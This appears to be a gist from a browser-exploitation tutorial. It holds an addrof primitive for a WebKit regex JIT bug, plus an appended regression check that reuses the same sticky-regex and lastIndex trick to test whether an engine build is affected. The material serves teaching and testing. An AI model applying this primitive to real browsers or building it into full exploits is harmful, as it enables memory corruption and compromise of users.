@LiveOverflow LiveOverflow/test.js
Last active Jun 22, 2019
Browser Exploitation - bowser 0x04
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t

// addrof primitive
function addrof(val) {
    var array = [13.37];
    var reg = /abc/y;

    // Target function
    var AddrGetter = function(array) {
        //reg[Symbol.match]();
        "abc".match(reg);
        return array[0];
    }

    // Force optimization
    for (var i = 0; i < 10000; ++i)
        AddrGetter(array);

    // Setup haxx
    regexLastIndex = {};
    regexLastIndex.toString = function() {
        array[0] = val;
        return "0";
    };
    reg.lastIndex = regexLastIndex;

    // Do it!
    return AddrGetter(array);
}
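
Added regression check, not part of the original gist: it uses the same sticky-regex and `lastIndex` setup to verify that an engine build treats `"abc".match(reg)` as a call that can run user code, so a read after the match observes the write made inside `toString`. The function names and the `warmup` parameter are hypothetical, chosen for this example.

```javascript
// Added example (not LiveOverflow's or Linus Henze's code). Function names
// and the `warmup` parameter are assumptions made for this check.

// Counts how often user code runs while one sticky-regex match coerces
// reg.lastIndex to a number. A conforming engine runs it during the match.
function coercionCallsDuringMatch() {
    const reg = /abc/y;
    let calls = 0;
    reg.lastIndex = { toString() { calls++; return "0"; } };
    "abc".match(reg);
    return calls;
}

// Warms up a reader function so the JIT compiles it, then lets the
// lastIndex coercion overwrite array[0] in the middle of the match.
// On a correct engine the reader returns the very object that was stored.
// A number coming back means the compiled code assumed the match had no
// side effects and read the slot with a stale element type.
function readAfterMatchIsFresh(val, warmup = 10000) {
    const array = [13.37];
    const reg = /abc/y;
    const reader = function (arr) {
        "abc".match(reg);
        return arr[0];
    };
    for (let i = 0; i < warmup; ++i) {
        reader(array);
    }
    reg.lastIndex = {
        toString() { array[0] = val; return "0"; }
    };
    const seen = reader(array);
    return { fresh: seen === val, seenType: typeof seen };
}
```

Run both functions in the engine build under test; `fresh: false` with `seenType: "number"` indicates the build is affected.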